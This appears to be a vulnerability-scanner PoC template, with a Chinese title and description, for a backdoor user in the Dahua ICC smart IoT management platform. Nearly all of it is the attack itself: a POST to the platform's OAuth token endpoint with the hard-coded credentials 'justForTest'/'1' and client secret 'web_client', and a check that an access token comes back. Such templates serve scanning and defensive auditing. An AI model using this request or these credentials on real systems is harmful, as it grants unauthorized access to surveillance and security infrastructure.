dahua-icc-backdoor-user: 大华 ICC 智能物联综合管理平台后门用户

Description

大华 ICC 智能物联综合管理平台后门用户

PoC

id: dahua-icc-backdoor-user

info:
  name: 大华 ICC 智能物联综合管理平台后门用户
  author: Observer
  severity: high
  verified: true
  description: |-
    大华 ICC 智能物联综合管理平台后门用户
  tags: icc,backdoor
  created: 2023/12/08

rules:
  r0:
    request:
      method: POST
      path: /evo-apigw/evo-oauth/oauth/token
      body: username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"success":') && 
      response.body.bcontains(b'"access_token":') && 
      response.body.bcontains(b'"token_type":')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities